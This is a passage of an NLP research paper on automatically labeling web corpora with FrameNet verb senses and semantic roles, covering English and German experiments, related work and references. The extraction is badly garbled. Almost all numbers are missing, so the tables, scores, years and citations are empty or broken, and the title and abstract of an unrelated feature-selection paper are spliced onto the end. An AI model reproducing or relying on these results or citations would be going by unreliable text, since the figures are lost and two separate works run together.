each test set that are evaluated for both sys- tems, i.e., the intersection it. on it, precision and f are higher for fnft-train for all test sets except masc. for masc, precision is similar, but recall is . points higher. for the verbs in it, the average number of training senses in was xl is two senses higher than for fnft-train. this larger sense cov- erage of the was xl is beneficial to recall on the fnft-test fate masc semeval p r f p r f p r f p r f was xl . * . * . . * . * . . * . * . . . * . was l . * . . . . * . . . * . . . * . fnft-train . . . . . . . . . . . . b-was xl . . * . . . * . . * . * . . . * . u-was xl . * . * . . * . * . . * . * . . . * . table : vsd p, r, f ; * marks significant differences to the system trained on fnft-train. masc test set which shows high polysemy. evaluating on the set difference between the sys- tems (test verbs that remain after the intersection is re- moved), we see that the lemma coverage of was xl is complementary to fnft-train. the difference dt is not empty for both systems, but the number of verbs that can be evaluated additionally for was xl is much larger than the one for fnft-train. the proportion of instances only evaluated for a specific train set to all evaluated instances ranges between % and % for was xl, and between % and % for fnft-train. combining training data. the complementary nature of the sets led us to evaluate two combinations of training sets: u-was xl consists of the union of was xl and fnft-train, b-was xl implements a backoff strategy and thus consists of fnft-train and those instances of was xl whose lemmas are not contained in the intersection with fnft-train (i.e., if fnft-train does not contain enough senses for a lemma, supplement with was xl). the third block in table shows that precision is higher or not significantly lower for b-was xl compared to fnft-train, recall and f are higher. u-was xl leads to higher recall compared to b- was xl, and allover highest f . this proves that our automatically labeled corpus was xl is com- plementary to the manually labeled fnft-train and contributes to a better coverage on diverse test sets. multiword verbs. our approach of training data generation also includes multiword verbs such as carry out. we treat those verb senses as additional senses of the head verb, for which we also create sense patterns, i.e., the sense for carry out is a specific sense of carry. as a result, we do not need to rely on additional multiword detection strategies for vsd. our was xl contains more than , sense instances of multiword verbs, of which have multiple framenet senses. we specifically evaluated the performance of our vsd system on multiwords and their head verbs from masc which contains relevant sense instances. the precision is . com- pared to . when training on fnft-train, at slightly higher coverage. while the test set is too small to provide significant results, there is an indication that the automatically labeled data also contribute to the disambiguation of multiword verbs. this analysis concludes our section on automatic sense labeling. in the next section, we will describe our method for automatically adding framenet role labels to the was-corpora. automatic labeling for semantic roles in this section, we present our linguistically informed approach to the automated labeling of framenet roles in arbitrary text. our method builds on the results of rich linguistic pre-processing including dependency parsing and uses role-level links in the llr semlink and the sense labels from section . first, a set of deterministic rules is applied to label syntactic argu- ments with verbnet semantic roles. then, we map the verbnet semantic roles to framenet roles based on role-level links in semlink and the automatically created sense labels. step a: verbnet role label transfer. our precision-oriented deterministic rules build on the re- sults of linguistic pre-processing. our pre-processing pipeline performs lemmatization, pos tagging, named-entity-recognition and parsing with the stan- ford parser (de marneffe et al., ), as well as se- mantic tagging with wordnet semantic fields. step we used the components from dkpro core (eckart de castilho and gurevych, ). we used the most-frequent-sense disambiguation heuristic which works well for the coarse-grained semantic types given by the wordnet semantic fields. named-entity tags are also mapped provides framenet sense labels for the target verbs. dependency parsing annotates dependency graphs, linking a governor to its dependents within a sen- tence. governors and dependents are represented by the heads of the phrases they occur in. for ver- bal governors, the dependency graphs correspond to predicate argument structures with the governor be- ing the predicate and the dependents corresponding to the argument heads. our rules attach verbnet role labels to dependent heads of their verbal governors. we can then derive argument spans by expanding the dependent heads by their phrases. the semantic role inventory as given by verbnet is our label space y (|y |= ). rule-based role labeling can be seen as label transfer where a corpus instance uj is given by the dependent of a verbal governor and its sentential context, including all linguistic annotations. then ruj is compared to a prototypical attribute representation rxi of a semantic role, derived from linguistic knowledge. more specifically, we iterate over the collapsed dependencies annotated by the stanford parser and apply a hierarchically organized chain of rules to the dependents of all verbal governors. in this rule chain, location and time roles are assigned first, in case a dependent is a location or has the semantic field value time. then, the other roles are annotated. this is done based on the dependency type in com- bination with named entity tags or semantic fields, either of the dependent or the verbal governor or both. an example rule is: for the dependency nsubj, the role experiencer is annotated if the governor’s seman- tic field is perception or emotion, and the role agent otherwise. this way, i in our example i feelfeeling strangely sad and low-spirited today is annotated with the experiencer role. some rules also check the semantic field of the de- pendent, e.g., the dependency prep with triggers the annotation of the role instrument, if the dependent is neither a person nor a group. often, it is not possible to determine a single verbnet role based on the avail- able linguistic information ( rules assign one role, rules assign roles, and rules assign roles), e.g., the distinction between theme and co-theme to wordnet semantic fields. it took a computational linguist days to develop the rules, using a sample of the verbnet annotations on propbank from semlink as a development set. can not be made. in such cases, multiple roles are annotated, which are all considered in the subsequent step b. evaluated on a test sample of verbnet an- notations on propbank, the percentage of correctly annotated roles among all annotated roles is . % – instances labeled with multiple roles are considered correct if the set of roles contains the gold label. the percentage of instances where a rule assigns at least one role was . %. step b: mapping verbnet roles to framenet roles. finally, the annotated verbnet roles are mapped to framenet roles using (i) the automati- cally annotated framenet sense and (ii) the semlink mapping of verbnet roles to framenet roles for this framenet sense (frame). the information on the framenet frame is crucial to constrain the one-to-many mapping of verbnet roles to fine-grained framenet roles. for example, the verbnet role agent is mapped to a large number of different framenet roles across all frames. while the semlink mapping allows unique framenet roles to be assigned in many cases, there are still a number of cases left where the rule-based approach annotates a set of framenet roles. examples are interlocutor and interlocutor for the discussion frame, or agent and cause for the cause harm frame. for the former the distinction between the roles is arbitrary, while for the latter further disambiguation may be desired. as the semlink mapping is not complete, our approach results in partially labeled data, i.e., a sentence may contain only a single predicate-role pair, even though other arguments of the predicate are present. our experiments show that we can train semantic role classifiers successfully on partially labeled data. we used the training set from das and smith ( ) (annotated with framenet roles) as a devel- opment set. evaluated on the test set from das and smith ( ), the percentage of correctly annotated roles among all annotated roles is . %. . creating the role-labeled corpus we use the two sense-labeled corpora was xl and was l as input for the automatic role label trans- fer, creating role-labeled corpora wasr xl and wasr l. we distinguish two variants of these cor- as in step a, instances labeled with a set of roles are considered correct if the set contains the gold label. instances roles senses r/s i/r wasr xl-uni , , . wasr l-uni , . wasr xl-set , , . wasr l-set , , . fnft? , , . . table : role statistics of automatically labeled corpora. pora, one that only contains those role instances with a unique role label, marked with the suffix -uni in table , and one that additionally includes sets of labels, marked with the suffix -set. for wasr xl, step a results in . million ar- guments labeled with verbnet roles. this number is reduced by % in step b as a result of the in- complete mapping between verbnet and framenet senses and roles in semlink. table shows that the resulting corpora contain , (wasr l-uni) and , (wasr xl-uni) uniquely assigned role instances for the verbs in our test sets, a lot compared to the , instances in fnft?, fnft filtered by the verbs in our four test sets. the counts are even higher for the corpora including sets of labels. due to the sparse labeling approach, our wasr cor- pora contain on average up to . roles per predicate, compared to an average of . roles per predicate in fnft?. this number rises to . when instances with sets of labels are added. . role classification experiments role classification system. we trained a supervised system for semantic role classification as a log-linear model per verb-frame using the features described in fürstenau and lapata ( ). note that we do not evaluate the task of argument identification. argument identification is performed by our rule-based verbnet role transfer and follows common syntactic heuristics based on dependency parsing. following zapirain et al. ( ), we specifi- cally consider the subtask of role classification, as we focus on the quality of our data on the semantic level. in this context it is important that the features of our role classifier do not use span information: they include lemma and pos of the argument head, its governing word, and the words right and left of the ar- gument head, the position of the argument relative to the predicate, and the grammatical relation between the argument head and the predicate. pre-processing is the same as for vsd. training and test data. we compare our role classifier trained on wasr xl-(set/uni) and wasr l-(set/uni) to the one based on fnft-train. test datasets are the same as for vsd, see table . . srl results and analysis results on wasr corpora. we evaluate p, r, and f on all frame-verb combinations for which there is more than one role in our training data. training the system on wasr xl-set and wasr l-set include training instances with sets of role labels. therefore, sets of role labels are among the predicted labels. in the evaluation, we count the label sets as correct if they contain the gold label. as expected, wasr xl-set leads to higher preci- sion and recall than wasr xl-uni, resulting from the larger role coverage in the training set, and the lenient evaluation setting, see table . we skip the wasr l-* corpora in table , because the benefits of the strict filtering for the sense corpora do not carry over to the role-labeled corpora: scores are lower for wasr l-* on all test sets because of a smaller number of role-labeled instances in the wasr l-* corpora (see table ). comparison to fnft-train. table compares the results of wasr xl-* to the system trained on fnft-train. note that we emulated the lenient eval- uation setting for fnft-train by retrieving the label set sl in wasr xl-set for a label l predicted by the fnft-train system and counting l as correct if any of the labels in sl matches the gold label. we, however, did not find any difference to the regular evaluation; it appears that the labeling errors of the fnft-train-based system are different from the label sets resulting from our labeling method. the precision for wasr xl-uni matches the pre- cision for fnft-train for the semeval and fate test sets (the difference is not significant). this is remark- able considering that only partially labeled data are available for training. for wasr xl-set, the precision scores for se- meval and fate improve over the fnft-train system, significantly for fate. recall of the wasr corpora is significantly lower allover, as a result of the sparse, partial labeling and the lower role coverage of our automatically labeled corpora. fnft-test fate masc semeval p r f p r f p r f p r f wasr xl-uni . * . * . . . * . . * . * . . . * . wasr xl-set . * . * . . * . * . . * . * . . . * . fnft-train . . . . . . . . . . . . b-wasr xl-uni . * . * . . . * . . . * . . . * . u-wasr xl-uni . * . * . . . * . . * . * . . . * . table : role classification p, r, f ; * marks significant differences to the system trained on fnft-train. figure : role classification learning curves. comparative analysis. we compare the perfor- mance of our wasr xl-uni and the fnft-train based system on the intersection of the evaluated senses between both systems. precision of fnft- train is higher on the intersection, except for semeval, where it is similar. fnft-train evaluates on average two more roles per sense than the wasr. evaluat- ing only on the difference, the instances not con- tained in the intersection, we see that wasr xl-uni contributes some instances that are not covered by fnft-train. these constitute between % and % of the total evaluated instances, compared to % to % instances added by fnft-train. the precision of wasr xl-uni on the intersection for masc is high at . , compared to . for fnft-test (not shown in table ). these results indicate that our wasr xl-uni is complementary to fnft-train. combining training data. to give further evi- dence of the complementary nature of the automati- cally labeled corpus, we run experiments that com- bine wasr xl-uni with fnft-train. we again use the union of the datasets (u-wasr xl-uni) and back- ing off to wasr xl-uni when fnft-train does not provide enough roles for a sense (b-wasr xl-uni). table shows better results for the backoff cor- pus than for the union. recall is significantly higher compared to fnft-train, and precision values are not significantly lower except for fnft-test. this demonstrates that our automatically role-labeled cor- pora can supplement a manually labeled corpus and benefit the resulting system. wasr sampling. because our wasr corpora show a zipfian distribution of roles (there are a few roles with a very large number of instances), we ran- domly sample nine training sets from wasr xl with a different maximal number of training instances per role s such that s = · i for i ∈ { , , .., }, i.e., s ranges from to . fig. shows the learning curves for precision on wasr xl-*. it shows that distributional effects occur, i.e., that certain sample sizes s lead to higher precision for a test set than using the full corpus. the masc test set particularly benefits from the sampling: combining fnft-train with the best sample from the wasr xl-set corpus (sampling instances per role) results in the allover highest precision ( . ) and f ( . ). german experiments to show that our method generalizes to other lan- guages, we applied it to german data. we used the salsa corpus (burchardt et al., ) as a source of german data with framenet- like labels. as salsa does not provide additional lexical unit examples, we split the corpus into a train- ing set s-train that is also used for the extraction of seed patterns, a development set s-dev, and a test set s-test. the proportion of train, development and test instances is . , . , . ; data statistics are shown in table . the unlabeled corpus used is based on dewac sections - (baroni et al., ). vsd corpus and evaluation. the llr used to generate more than , seed patterns consists verbs senses roles inst(s) inst(r) s-test , , , s-dev , , , s-train , , , was-de (t= . ) - , - wasr-de-set , , wasr-de-uni , , table : german dataset statistics on verbs. of s-train and the german wiktionary based on the linking by hartmann and gurevych ( ). dewac is labeled based on those patterns, and the thresholds t and f are determined in a vsd task on s-dev using a subset of the corpus based on sections - . the threshold t= . together with a discriminat- ing filter of f= . result in the best precision, and t= . in the best f score. therefore, we perform extrinsic evaluation in a vsd task on s-test with was-de (t= . ) and on the combinations u-was-de (union with s-train) and b-was-de (backoff-variant). the results in table show that the performance of the was-de-based system is worse than the s- train-based one, but the backoff version reaches best scores allover, indicating that our was-de corpora are complementary to s-train. p r f was-de . * . * . b-was-de . . * . u-was-de . * . * . s-train . . . table : german vsd p, r, f ; * marks significant differ- ences to s-train. srl corpus and evaluation. we adapt the rule- based verbnet role-labeling to german dependencies from the mate-tools parser (seeker and kuhn, ), and perform steps a and b on was-de, resulting in wasr-de-set/uni (see table ). we train our role classification system on the cor- pora in order to evaluate them extrinsically. training on wasr-de-uni results in precision of . – better than for english, but still significantly lower than for the s-train system with . . recall is very low at . . this is due to the low role coverage of the wasr corpora shown in table . the evaluation shows that our approach can be ap- plied to german. for vsd, the automatically labeled data can be used to improve on using s-train alone; improvements in precision are not significant, which has several potential causes, e.g., the smaller set of llrs used for seed pattern extraction compared to english, and the smaller size of the resulting corpora. the smaller corpora also result in very low recall for the role classification. future work could be to extend the german dataset by adding additional resources to the llr, for in- stance germanet (hamp and feldweg, ). ex- tending the semlink mapping to frames unique to salsa should additionally contribute to an im- proved role coverage. related work relevant related work is research on (i) the automatic acquisition of sense-labeled data for verbs, (ii) the au- tomatic acquisition of role-labeled data for framenet srl, and (iii) approaches to framenet srl using lexical resources and llrs, including rule-based and knowledge-based approaches. automatic acquisition of sense-labeled data. most previous work on automatically sense-labeling corpora for wsd focussed on nouns and wordnet as a sense inventory, e.g., leacock et al. ( ), mi- halcea and moldovan ( ), martinez ( ), duan and yates ( ). in this section, we describe work that specifically considers verbs. besides the already introduced work by cholakov et al. ( ), which we extended by discriminating patterns and adapted to the framenet verb sense inventory, this includes work by kübler and zhekova ( ), who extract example sentences from several english dictionar- ies and various types of corpora, including web cor- pora. they use a lesk-like algorithm to annotate target words in the extracted sentences with word- net senses and use them as training data for wsd. they evaluate on an all-words task and do not find performance improvements when training on the au- tomatically labeled data alone or on a combination of automatically labeled and gold data. automatic acquisition of role-labeled data. pre- vious work in the automatic acquisition of role- labeled data uses annotation projection methods, i.e., aligning a role-annotated sentence to a new sentence on the syntactic level and transferring the role anno- tations to the aligned words. the goals of fürstenau and lapata ( )’s work are most similar to our work. they perform an- notation projection of framenet roles for english verbs. for this, they pair sentences in the british na- tional corpus with frame-annotated sentences, align their syntactic structures (including arguments), and project annotations to the new sentences. they simu- late a “low-resource” scenario that only provides few training instances (called seed sentences) by vary- ing the number of seed sentences and added labeled sentences. they use the automatically labeled data together with seed training data to train a supervised system and find improvements over self-training. a main difference to our approach is that fürstenau and lapata ( ) do not use external information from llrs or other lexical resources like wordnet. like our approach, their approach creates a sparse labeling by a) discarding sentences that do not align well to their seeds, and b) discarding candidate pairs for which not all roles could be mapped. this leads to a high-precision approach that does not allow par- tially labeled data. such an approach does have disad- vantages, e.g., a potentially lower domain variability of the corpus, since they only label sentences very similar to the seed sentences. repeating their exper- iments for german, fürstenau ( ) finds that the variety of the automatically annotated sentences de- creases when a larger expansion corpus is used. in our approach, the asp patterns generalize from the seed sentences (cf. section ), leading us to assume that our knowledge-based approach could be more generous with respect to such variability; we already successfully evaluated it on four datasets from vari- ous domains, but would like to further confirm our assumption in a direct comparison. another approach for training data generation for propbank-style semantic role labeling is described in woodsend and lapata ( ). using comparable corpora they extract rewrite rules to generate para- phrases of the original propbank sentences. they use a model trained on propbank as the seed corpus to filter out noise introduced by the rewrite rules. a model trained on the extended propbank corpus out- performs the state of the art system on the conll- dataset. recently, pavlick et al. ( ) pre- sented a similar method to expand the fnft corpus through automatic paraphrasing. noise was filtered out using crowdsourcing and the resulting frame- labeled corpus showed a lexical coverage three times as high as the original fnft. however, they did not evaluate the augmented corpus as training data for semantic role classification. framenet srl using lexical resources. simi- lar to our approach of automatically creating role- labeled data in section , there are other rule-based approaches to framenet srl that rely on framenet and other lexical resources (shi and mihalcea, ; shi and mihalcea, ). both describe a rule-based system for framenet srl that builds on the results of syntactic parsing for the rule-based assignment of semantic roles to syntactic constituents. the role as- signment uses rules induced from the framenet full- text corpus. these rules encode sentence-level fea- tures of syntactic realizations of frames; they are com- bined with word-level semantic features from word- net including the countability of nouns or attribute relations of an adjective indicating which nouns it can modify. since the coverage of the induced rules is low, they are complemented by default rules. the approach to srl introduced by litkowski ( ) uses a dictionary built from framenet fulltext annotations to recognize and assign semantic roles. their system first performs frame disambiguation and then tries to match syntactic constituents produced by a parser with syntactic patterns included the gen- erated dictionary. their system is evaluated on the semeval- task for linking events and their partici- pants in discourse. it shows very low recall, which is mainly due to the low coverage of their framenet dictionary with regard to syntactic patterns. our approach differs from previous rule-based ap- proaches to srl in that we do not use the rule-based system directly, but use it to create labeled training data for training a supervised system. this transduc- tive semi-supervised learning setup should be able to deal better with the noise introduced by the rule based system than the inductive rule-based approaches. the work by kshirsagar et al. ( ) uses lexi- cal resources to enhance framenet srl. they also use the framenet sense examples and semlink, but in a completely different manner. regarding the sense examples, they employ domain adaptation tech- niques to augment the feature space extracted from the framenet training set with features from the sense examples, thereby increasing role labeling f by % compared to the baseline system semafor. we use the framenet example sentences only indi- rectly: as seed sentences for the frame label transfer (cf. step ), they provide distant supervision for the automatic frame labeling. our approach is comple- mentary to the one by kshirsagar et al. ( ) who use the sense examples for role labeling. kshirsagar et al. ( ) only briefly report on their experiments using semlink. they used the transla- tion of propbank labels to framenet in the semlink corpus as additional training data, but found that this strategy hurt role labeling performance. they credit this to the low coverage and errors in semlink, which might be amplified by the use of a transitive linking (from propbank to framenet via verbnet). in this work, we successfully employ semlink: we use the verbnet-framenet (sense- and role-level) linking from semlink in our role label transfer approach (step ). the resulting automatically role-labeled training data improve role classification in combi- nation with the fn-train set (cf. section . ). we assume that the large-scale generation of training data smoothes over the noise resulting from errors in the semlink mapping. kshirsagar et al. ( ) additionally use features from propbank srl as guide features and exploit the framenet hierarchy to augment the feature space, a method complementary to our approach. their best results combine the use of example sentences and the framenet hierarchy for feature augmenta- tion. they only evaluate on the fnft-test set, as has become standard for framenet srl evaluation. our distantly supervised corpus might be useful for domain adaptation to other datasets, as our role clas- sification evaluation shows. according to our above analysis, our strategy is complementary to the approach by kshirsagar et al. ( ). it would be interesting to evaluate to what de- gree our automatically labeled corpus would benefit their system. relation to framenet srl in this section, we discuss the potential impact of our work to state-of-the-art framenet srl. our experimental setup evaluates frame disam- biguation and role classification separately, which is a somewhat artificial setup. we show that our automat- ically generated training data are of high quality and contribute to improved classification performance. this section motivates that the data can also be useful in a state-of-the-art srl setting. for a long time, the semafor system has been the state-of-the-art framenet srl system (das et al., ; das et al., ). recently, systems were intro- duced that use new ways of generating training fea- tures and neural-network based representation learn- ing strategies. we already introduced (kshirsagar et al., ). hermann et al. ( ) use distributed representations for frame disambiguation. others integrate features based on document-level context into a new open-source srl system framat++ (roth and lapata, ), or present an efficient dynamic program formalization for framenet role labeling (täckström et al., ). they all report improve- ments on semafor results for full framenet srl. hermann et al. ( ) report state-of-the-art re- sults for framenet frame disambiguation. their approach is based on distributed representations of frame instances and their arguments (embeddings) and performs frame disambiguation by mapping a new instance to the embedding space and assigning the closest frame label (conditioned on the the lemma for seen predicates). they report that they improve frame identification accuracy over semafor by % for ambiguous instances in the fnft-test set, up to . % accuracy. they also improve over the se- mafor system for full srl, reporting an f of . % compared to . % from das et al. ( ). our frame disambiguation results are not directly comparable to their results. we also evaluate on ambiguous instances, but only on verbal predicates, which are typically more polysemous than nouns and adjectives and more difficult to disambiguate. the currently best-performing framenet srl sys- tem is the one presented by fitzgerald et al. ( ). they present a multitask learning setup for semantic role labeling which they evaluate for propbank and framenet srl. the setup is based on a specifically designed neural network model that embeds input and output data in a shared, dense vector space. us- ing the frame identification model from hermann et al. ( ), their results significantly improve on the previous state-of-the-art for full framenet srl, reaching f of . % on fnft-test – but only when training the model jointly on framenet training data and propbank-labeled data in a multitask setup. fitzgerald et al. ( ) report that the perfor- mance of their system on framenet test data suffers from the small training set available – only training on framenet training data yields similar results to täckström et al. ( ). the joint training setup does not benefit propbank srl due to the small size of the framenet training set in comparison to the propbank data. this shows that additional training data for framenet, for instance our automatically labeled cor- pora, could also benefit a state-of-the-art system. an explicit evaluation of this assumption or comparison to this system is left to future work. based on the discussion above, and on the frame and role classification experiments evaluated on four test sets, we expect that the data we generate with our method are complementary to the standard framenet training data and can be used to enhance state-of-the- art srl systems. we leave empirical evaluation of this claim to future work. by publishing our auto- matically labeled corpora for research purposes, we support efforts by other researchers to analyze them and integrate them into their systems. discussion and outlook the evaluation shows our purely knowledge-based approach for automatic label transfer results in high- quality training data for english srl that is comple- mentary to the fnft corpus. for vsd, our data lead to similar precision to a standard supervised setup, but at higher recall. learn- ing curves indicate that with an even larger corpus we may be able to further improve precision. for role classification, the sparse labeling leads to a low role recall, but high precision is achieved for the cov- ered roles. one cause for the sparse labeling is the incomplete mapping between verbnet and framenet roles in semlink; in future work we would like to ex- tend the semlink mapping automatically to enhance the coverage of our method, and to disambiguate ambiguous labels to further increase precision. as a knowledge-based approach, our method is particularly well-suited for languages and domains for which role-labeled corpora are lacking, but llrs are available or can be created automatically. we therefore applied our approach to german data; the resulting sense-labeled corpus is complementary to the training data from salsa . the role classifica- tion evaluation should improve with a larger corpus. state-of-the-art srl systems still rely on super- vised training, even when advanced methods such as deep learning are used. in section , we discussed in detail how our method relates to and comple- ments the most recent developments in framenet srl. it would be interesting to evaluate the bene- fits that our automatically labeled data can add to an advanced srl system. we expect particularly strong benefits in the context of domain adaptation: currently, framenet srl systems are only evaluted on in-domain test data. our method can be adapted to other sense and role inventories covered by llrs (e.g., verbnet and prop- bank) and to related approaches to srl and semantic parsing (e.g., qa-srl (he et al., )); the latter requires a mapping of the role inventory to a suitable llr, for instance mapping the role labels in qa-srl to semlink. we would also like to evaluate our ap- proach in comparison to other methods for training data generation, for instance methods based on align- ments (fürstenau and lapata, ), or paraphrasing (woodsend and lapata, ). conclusion we presented a novel approach to automatically generate training data for framenet srl. it fol- lows the distant supervision paradigm and performs knowledge-based label transfer from rich external knowledge sources to large-scale corpora without relying on manually labeled corpora. by transferring labels to a large, diverse web- corpus (ukwac) the potential of our approach for generating data for different domains becomes appar- ent. by applying it to german data, we showed that our approach is applicable across languages. as a further result of our work, we publish the automati- cally labeled corpora and release our implementation for knowledge-based role labeling (cf. step a in section ) as open source software. automatic label transfer using linked resources has become popular in relation extraction (mintz et al., ) and has been applied to vsd (cholakov et al., ), but not to srl. in this work, we showed that knowledge-based label transfer from llrs to large-scale corpora offers great opportunities also for complex semantic tasks like srl. acknowledgments this work has been supported by the german re- search foundation under grant no. gu / - , grant no. gu / - , and grant no. grk / . we thank the action editors and anonymous review- ers for their thoughtful comments. additional thanks go to nancy ide and collin baker for providing the masc dataset. references marco baroni, silvia bernardini, adriano ferraresi, and eros zanchetta. . the wacky wide web: a collection of very large linguistically processed web- crawled corpora. language resources and evalua- tion, ( ): – . jonathan berant, vivek srikumar, pei-chun chen, abby vander linden, brittany harding, brad huang, peter clark, and christopher d. manning. . model- ing biological processes for reading comprehension. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar. claire bonial, kevin stowe, and martha palmer. . renewing and revising semlink. in proceedings of the nd workshop on linked data in linguistics (ldl- ): representing and linking lexicons, termi- nologies and other language data, pages – , pisa, italy. aljoscha burchardt and marco pennacchiotti. . fate: a framenet-annotated corpus for textual en- tailment. in proceedings of the sixth international conference on language resources and evaluation (lrec’ ), pages – , marrakech, morocco. aljoscha burchardt, kathrin erk, anette frank, andrea kowalski, sebastian padó, and manfred pinkal. . the salsa corpus: a german corpus resource for lexical semantics. in proceedings of the th interna- tional conference on language resources and evalua- tion (lrec ), pages – , genoa, italy. kostadin cholakov, judith eckle-kohler, and iryna gurevych. . automated verb sense labelling based on linked lexical resources. in proceedings of the th conference of the european chapter of the as- sociation for computational linguistics (eacl ), pages – , gothenburg, sweden. dipanjan das and noah a. smith. . semi- supervised frame-semantic parsing for unknown pred- icates. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies, pages – , portland, oregon, usa. dipanjan das, nathan schneider, desai chen, and noah a. smith. . probabilistic frame-semantic parsing. in human language technologies: the annual conference of the north american chapter of the asso- ciation for computational linguistics, pages – , los angeles, ca, usa. dipanjan das, desai chen, andré f. t. martins, nathan schneider, and noah a. smith. . frame-semantic parsing. computational linguistics, ( ): – . marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed dependency parses from phrase structure parses. in proceedings of the th edition of the international con- ference on language resources and evaluation, pages – , genoa, italy. weisi duan and alexander yates. . extracting glosses to disambiguate word senses. in human lan- guage technologies: the annual conference of the north american chapter of the association for computational linguistics, hlt ’ , pages – , los angeles, ca, usa. richard eckart de castilho and iryna gurevych. . a broad-coverage collection of portable nlp com- ponents for building shareable analysis pipelines. in proceedings of the workshop on open infrastructures and analysis frameworks for hlt (oiaf hlt) at coling , pages – , dublin, ireland. associ- ation for computational linguistics and dublin city university. parvin sadat feizabadi and sebastian padó. . crowd- sourcing annotation of non-local semantic roles. in proceedings of the th conference of the european chapter of the association for computational linguis- tics, volume : short papers, pages – , gothen- burg, sweden. charles j. fillmore, . linguistics in the morning calm, chapter frame semantics, pages – . han- shin publishing company, seoul, south korea. nicholas fitzgerald, oscar täckström, kuzman ganchev, and dipanjan das. . semantic role labeling with neural network factors. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal. marco fossati, claudio giuliano, and sara tonelli. . outsourcing framenet to the crowd. in proceedings of the st annual meeting of the association for com- putational linguistics (volume : short papers), pages – , sofia, bulgaria. hagen fürstenau and mirella lapata. . semi- supervised semantic role labeling via structural alignment. computational linguistics, ( ): – . hagen fürstenau. . semi-supervised semantic role labeling via graph alignment, volume of saarbrücken dissertations in computational linguis- tics and language technology. german research cen- ter for artificial intelligence and saarland university, saarbrücken, germany. mark hall, eibe frank, geoffrey holmes, bernhard pfahringer, peter reutemann, and ian h. witten. . the weka data mining software: an update. sigkdd explorations, ( ): – . birgit hamp and helmut feldweg. . germanet - a lexical-semantic net for german. in proceedings of the acl workshop automatic information extraction and building of lexical semantic resources for nlp applications, pages – , madrid, spain. patrick hanks. . lexical analysis: norms and ex- ploitations. mit press, cambridge, ma, usa. silvana hartmann and iryna gurevych. . framenet on the way to babel: creating a bilingual framenet using wiktionary as interlingual connection. in pro- ceedings of the st annual meeting of the associa- tion for computational linguistics (acl ), pages – , sofia, bulgaria. kazi saidul hasan and vincent ng. . why are you taking this stance? identifying and classifying reasons in ideological debates. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar. luheng he, mike lewis, and luke zettlemoyer. . question-answer driven semantic role labeling: us- ing natural language to annotate natural language. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , lisbon, portugal. karl moritz hermann, dipanjan das, jason weston, and kuzman ganchev. . semantic frame identifica- tion with distributed word representations. in pro- ceedings of the nd annual meeting of the associa- tion for computational linguistics (volume : long papers), pages – , baltimore, maryland, usa. meghana kshirsagar, sam thomson, nathan schneider, jaime carbonell, noah a. smith, and chris dyer. . frame-semantic role labeling with heterogeneous annotations. in proceedings of the rd annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing (volume : short papers), pages – , beijing, china. sandra kübler and desislava zhekova. . semi- supervised learning for word sense disambiguation: quality vs. quantity. in proceedings of the inter- national conference ranlp- , pages – , borovets, bulgaria. claudia leacock, george a. miller, and martin chodorow. . using corpus statistics and wordnet relations for sense identification. computational linguistics, ( ): – . ken litkowski. . clr: linking events and their participants in discourse using a comprehen- sive framenet dictionary. in proceedings of the th international workshop on semantic evaluation (se- meval ’ ), pages – , los angeles, ca, usa. david martinez. . on the use of automatically acquired examples for all-nouns word sense disam- biguation. journal of artificial intelligence research, : – . rada mihalcea and dan moldovan. . an auto- matic method for generating sense tagged corpora. in proceedings of the american association for artifi- cial intelligence (aaai ), orlando, florida, usa. mike mintz, steven bills, rion snow, and daniel juraf- sky. . distant supervision for relation extraction without labeled data. in proceedings of the joint con- ference of the th annual meeting of the acl and the th international joint conference on natural lan- guage processing of the afnlp, pages – , suntec, singapore. rebecca j. passonneau, collin f. baker, christiane fell- baum, and nancy ide. . the masc word sense corpus. in proceedings of the eight international conference on language resources and evaluation (lrec’ ), pages – , istanbul, turkey. ellie pavlick, juri ganitkevitch, tsz ping chan, xuchen yao, benjamin van durme, and chris callison-burch. . domain-specific paraphrase extraction. in pro- ceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (vol- ume : short papers), pages – , beijing, china. octavian popescu, martha palmer, and patrick hanks. . mapping cpa patterns onto ontonotes senses. in proceedings of the ninth international conference on language resources and evaluation (lrec’ ), pages – , reykjavik, iceland. michael roth and mirella lapata. . context-aware frame-semantic role labeling. transactions of the association for computational linguistics, : – . josef ruppenhofer, caroline sporleder, roser morante, collin baker, and martha palmer. . semeval- task : linking events and their participants in discourse. in proceedings of the th international workshop on semantic evaluation, pages – , upp- sala, sweden. wolfgang seeker and jonas kuhn. . making ellipses explicit in dependency conversion for a german tree- bank. in nicoletta calzolari et al., editor, proceedings of the eight international conference on language re- sources and evaluation (lrec’ ), pages – , istanbul, turkey. lei shi and rada mihalcea. . open text semantic parsing using framenet and wordnet. in demon- stration papers at hlt-naacl , hlt-naacl– demonstrations ’ , pages – , stroudsburg, pa, usa. lei shi and rada mihalcea. . putting pieces to- gether: combining framenet, verbnet and wordnet for robust semantic parsing. in computational lin- guistics and intelligent text processing, pages – . springer berlin heidelberg. oscar täckström, kuzman ganchev, and dipanjan das. . efficient inference and structured learning for semantic role labeling. transactions of the associa- tion for computational linguistics, : – . kristian woodsend and mirella lapata. . text rewriting improves semantic role labeling. journal of artificial intelligence research, : – . david yarowsky. . unsupervised word sense dis- ambiguation rivaling supervised methods. in pro- ceedings of the rd annual meeting on association for computational linguistics, pages – , cambridge, massachusetts, usa. benat zapirain, eneko agirre, lluis marquez, and mi- hai surdeanu. . selectional preferences for se- mantic role classification. computational linguistics, ( ): – . a redundancy-removing feature selection algorithm for nominal data submitted june accepted september published october corresponding author zhihua li, zhli@jiangnan.edu.cn academic editor feiping nie additional information and declarations can be found on page doi . /peerj-cs. copyright li and gu distributed under creative commons cc-by . open access a redundancy-removing feature selection algorithm for nominal data zhihua li , , , and wenqu gu , key laboratory of advanced process control for light industry ministry of education, jiangsu, china engineering research center of internet of things technology, application ministry of education, jiangsu, china department of computer science, engineering school of internet of things engineering, jiangnan university, jiangsu, china department of computer science, georgia state university, atlanta, ga, united states of america abstract no order correlation or similarity metric exists in nominal data, and there will always be more redundancy in a nominal dataset, which means that an efficient mutual information-based nominal-data feature selection method is relatively difficult to find. in this paper, a nominal-data feature selection method based on mutual information without data transformation, called the redundancy-removing more relevance less redundancy algorithm, is proposed. by forming several new 